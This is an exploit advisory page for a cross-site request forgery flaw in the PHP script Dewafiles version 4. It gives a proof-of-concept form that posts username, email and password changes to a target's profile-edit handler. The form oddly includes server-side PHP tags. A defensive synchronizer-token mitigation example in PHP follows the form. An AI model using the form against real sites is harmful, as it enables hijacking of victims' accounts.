
Dewafiles 4 Cross Site Request Forgery

Posted on 08 June 2013

# Exploit Title: Dewafiles Versi 4 - CSRF Vulnerabilities
# Author Exploit : vir0e5
# Date : 08-06-2012
# Site : http://blog.megasoft-id.com/
# Vendor : http://blog.megasoft-id.com/article/dewafiles/
# Version : Dewafiles versi 4
# Software Link: http://blog.megasoft-id.com/article/dewafiles/
# Tested on : Windows and Linux
# CVE : [not yet]

[ Vulnerable File ]
~ proses_edit_profile.php

[ Exploit ]
<form enctype="multipart/form-data" action="http://korban.com/proses_edit_profile.php" method="POST">
<input type="hidden" name="id" value="<?PHP echo $id; ?>">
<p><me>Username</me></br>
<input type="text" style="width:100%" required name='username' value="<?PHP echo $_SESSION['my_name']; ?>">
<p><me>Email</me></br>
<input type="text" style="width:100%" required name='email' value="<?PHP echo $email; ?>">
<p><me>Password</me></br>
<input type="password" style="width:100%" required name='pswd' value="<?PHP echo $pswd; ?>">
<p><me>Gender</me></br>
<select style="width:100%" required name="gender">
<option><?PHP echo $gender; ?></option>
<option>Male</option>
<option>Female</option>
</select>
<p><me>Your Avatar</me></br>
<img src="<?PHP echo $photo ?>" width="60" height="60"></br>
Default Avatar : "<?PHP echo $photo; ?>"</br>
Change => <input style="width:200px" type="file" name="photo">
<p>
<input type="submit" class="button" value="Save">
</form>

*************************************************************
[+] Greetz :INDONESIAN SECURITY - TASIK CYBER - INDONESIAN CODER - EXPLOIT-ID;
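
[ Mitigation example ]
The following is an added example, not code from Dewafiles or from the advisory author: a per-session synchronizer token that a handler such as proses_edit_profile.php can verify before applying a profile change. The helper names csrf_token() and csrf_verify() and the form field name csrf_token are assumptions; the vendor's handler source is not shown on this page.

```php
<?php
// Added example: synchronizer-token CSRF defence for a profile-edit handler.
// Helper and field names are hypothetical; they are not Dewafiles code.

// SameSite=Lax keeps the session cookie off cross-site POSTs (PHP >= 7.3).
session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true]);
session_start();

// Return the per-session token, creating it on first use.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// True only when the submitted value is a string equal to the session token.
// The parameter is untyped so an array value (csrf_token[]=x) is rejected
// by the is_string() check instead of raising a TypeError.
function csrf_verify($submitted): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    return is_string($submitted)
        && $expected !== ''
        && hash_equals($expected, $submitted);
}

// In the page that renders the edit-profile form, emit the token:
// echo '<input type="hidden" name="csrf_token" value="'
//    . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';

// At the top of the handler, before any profile field is read or written:
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrf_verify($_POST['csrf_token'] ?? null)) {
        // A form hosted on another origin cannot read the session token,
        // so its request is rejected here and the profile is left unchanged.
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
    // Defence in depth: require the current password before changing pswd.
    // ... existing profile update logic continues here ...
}
```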

 
